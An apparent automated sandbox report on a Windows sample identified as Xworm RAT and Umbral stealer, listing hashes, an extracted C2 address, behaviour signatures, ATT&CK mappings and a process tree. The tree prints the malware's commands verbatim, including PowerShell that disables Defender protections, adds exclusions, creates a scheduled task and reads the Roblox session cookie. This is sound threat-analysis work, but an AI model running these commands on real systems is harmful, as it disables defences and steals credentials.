Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
21-10-2024 01:47
General
-
Target
df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe
-
Size
870KB
-
MD5
bea28a1e680f8b8053e64c8810dad71e
-
SHA1
8464a9aeaa3a290c9a027484a5b6e1759e9eb0e8
-
SHA256
df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0
-
SHA512
b22641529e6e642f852bc43534d49c7bc47668a432edcd3f67f4a879c77aa0e92e1ce259fb41773ba15f0a70396fe031b1073320bc95812fd3fdd2a231caa669
-
SSDEEP
12288:47wITbhKx7WQeu3D9FPJXOmQ+qO39WoCuwTvk83uRCS26qH3OqtwIulkyF3SkH:4EITMvRFhRRbNWoCfkYSEH3OqtwIuX
Malware Config
Extracted
xworm
build-what.gl.at.ply.gg:10272
-
Install_directory
%AppData%
-
install_file
svchost.exe
Signatures
-
Detect Umbral payload 2 IoCs
-
Detect Xworm Payload 2 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Xworm
Xworm is a remote access trojan written in C#.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Start PowerShell.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 6 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 44 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe"C:\Users\Admin\AppData\Local\Temp\df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe"1⤵
- Checks computer location settings
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\AyoStandard.exe"C:\Users\Admin\AppData\Local\AyoStandard.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -command "& {Start-Process -FilePath 'C:\Windows\Temp\Umbral.exe' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\Umbral.exe"C:\Windows\Temp\Umbral.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Update Service.exe"C:\Users\Admin\AppData\Local\Update Service.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Update Service.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update Service.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Umbral.exe"C:\Users\Admin\AppData\Local\Umbral.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Umbral.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Umbral.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.9MB
MD5248fbfb247664cd19804f7e69f0d9f7d
SHA1f36e218ce7f7eaf8fc5a39d1cccc1125a1249266
SHA2566209a4f84c4d423a5ed048595ab8fa33e8354363ea69000dcb2887e6a5264695
SHA5126621f2c2e17b29aee8076e217647bf9efed8e2c0148d3f054cdf70232569820d600468213a9c77e4dd296cfba3b936f2dfc298538ea4d83f579194b572fb9b65
-
Filesize
1KB
MD54c8fa14eeeeda6fe76a08d14e08bf756
SHA130003b6798090ec74eb477bbed88e086f8552976
SHA2567ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5
SHA512116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
948B
MD560e10be2cf4c923b4c11e353a972b9df
SHA17ece5dd0ad060732f4797c78f2b201d4a5f8dd24
SHA2563284c7f1908551d127043dee22cfd643f58809ae4c684a3b9965022a4c6558b3
SHA51220b39c897ebd15887264819a83b215c1288c77c75d304e0e8d9003c46cbabc71b0d3ec5109b39c120babacb99a963c8244e569546871595c3d515b22de86a7a7
-
Filesize
1KB
MD52a75c2057536d71d287d7cefff04eec3
SHA1c61131dee25db97244118daaf982c0bd1389b8b4
SHA25693cf99b87df289b80cc8be11623fbb0b09812f2dcee9986e76cedb188ca942a0
SHA5121d8877aeade86757fb7d37b54abf27e8d6579a7a51bcbba549bcfd0c66a2b4383ab7f34eb4621c031262df4e5266332e1427f64af268922e24c24ed9ca94f150
-
Filesize
1KB
MD5950555d1073918e9d86a2df429089a6b
SHA1b9faade8f97fd0e21b51ccbf5942bb6995a108fa
SHA256cc110b09eab6c53c011913c20650e977a53a05c5615d7e25459ca64e1338a74e
SHA512327262f6d085f5ed1ac2b1d22a096df46e36245eb4805f846506dfb335929d3651a3fa616661a392de4b6bdc4bdb30629b295d803985dc95958d3149ed7b251a
-
Filesize
944B
MD5470a31aac9cf705179e47a32ce51f121
SHA1757fc377e0198cae813c99f4d63e29d2a82ec1ec
SHA256cf69cc666c1919e86261080d13dedb0301387c99f3360b674e211bce4071c80c
SHA5125e667ce8238d0c2b6453b3f34757083cda67834c121ac5726e13bcd7689add07d410b67f5227bb9f9e79f6540e8579ff82e95323243905f825c9d7cf8a05cc1b
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
SHA192a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA2565ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA5128d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c
-
Filesize
64B
MD58fe70e63c44ca0ecd48b0180321927d3
SHA11419bf270210e065da1a4a36ef0d7f88ca89ee04
SHA256f748e385e9b3b1eed95616ddc565f705187c5a9f5cc6a5e5ac132e43eb681eb2
SHA512b01393a29399d9415c7247bcd309c44487ad8ffacb91fac34900d34a32d01fb5ef21492ae5573457015ee5f598901d85f99f2ba51da40c8b2285ae84bc7c6c61
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
227KB
MD5b876a9986ec4c6328ec6c702543f29c5
SHA17b4e1df1ea7946d1c6c065af9503d106b8310578
SHA256cef6907644852d2c121218c464a70e125a39750a5cbd31c556d5c214a3e96750
SHA512179332260823d94d5528692f26d22118dc87bedfe3edc2ed5ccb12c531fdfb0529bfea8662ce5dca038c3ba8048176e8df89280421af7d3f7703a14d5c035041
-
Filesize
67KB
MD5b60e7b4d97aa0e7568b5f1e1b0cd2315
SHA10a3dc1c0c807017dc115685309ea59f2aba956cd
SHA2569f053ed5f7835f881b70f1569288c360b221431f797cd3018adcd769f02cad57
SHA5124ed1d1ba0abad06a463a2ecc220cbee5635ed9719744aa1a70a8daaeb05eb5df56c0f2123fe7ec631fc30e40c64765d6d45ef99c0e3f6d76ab8a828a56274657
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
136KB
-
Filesize
40KB
-
Filesize
256KB
-
Filesize
472KB
-
Filesize
320KB
-
Filesize
120KB
-
Filesize
72KB
-
Filesize
96KB
-
Filesize
2.1MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
2.1MB
-
Filesize
10.8MB
-
Filesize
896KB
-
Filesize
72KB
-
Filesize
3.8MB
-
Filesize
104KB
-
Filesize
9.9MB
-
Filesize
10.8MB
-
Filesize
10.8MB